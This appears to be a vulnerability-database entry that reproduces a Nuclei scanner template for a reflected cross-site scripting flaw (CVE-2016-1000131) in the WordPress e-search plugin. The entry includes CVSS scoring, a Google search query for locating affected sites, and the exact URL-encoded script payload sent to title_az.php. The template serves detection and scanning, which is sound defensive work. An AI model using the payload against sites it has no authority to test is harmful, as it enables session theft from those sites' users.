Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2016-1000131
HistoryJul 16, 2021 - 5:55 p.m.

WordPress e-search <=1.0 - Cross-Site Scripting

2021-07-1617:55:47
ProjectDiscovery
github.com
4

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

50.3%

WordPress e-search 1.0 and before contains a reflected cross-site scripting vulnerability via title_az.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

id: CVE-2016-1000131

info:
  name: WordPress e-search <=1.0 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress e-search 1.0 and before contains a reflected cross-site scripting vulnerability via title_az.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Update to the latest version of the WordPress e-search plugin to mitigate this vulnerability.
  reference:
    - http://www.vapidlabs.com/wp/wp_advisory.php?v=393
    - https://wordpress.org/plugins/e-search
    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000131
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2016-1000131
    cwe-id: CWE-79
    epss-score: 0.00114
    epss-percentile: 0.44874
    cpe: cpe:2.3:a:e-search_project:esearch:1.0:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: "e-search_project"
    product: esearch
    framework: wordpress
    google-query: "inurl:\"/wp-content/plugins/e-search\""
  tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/e-search/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Search'
          - 'Tags:'
          - 'Tested up to:'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210087f90d43de3ee7371ad3bd5348bbd9076a86e5c3eb5fcbb3b38dd6983ca1eea4022100b48c30c74874b02dd3b0705b8d01d640190d1086f149fb729756ed5c2c5c9e42:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

50.3%

Related for NUCLEI:CVE-2016-1000131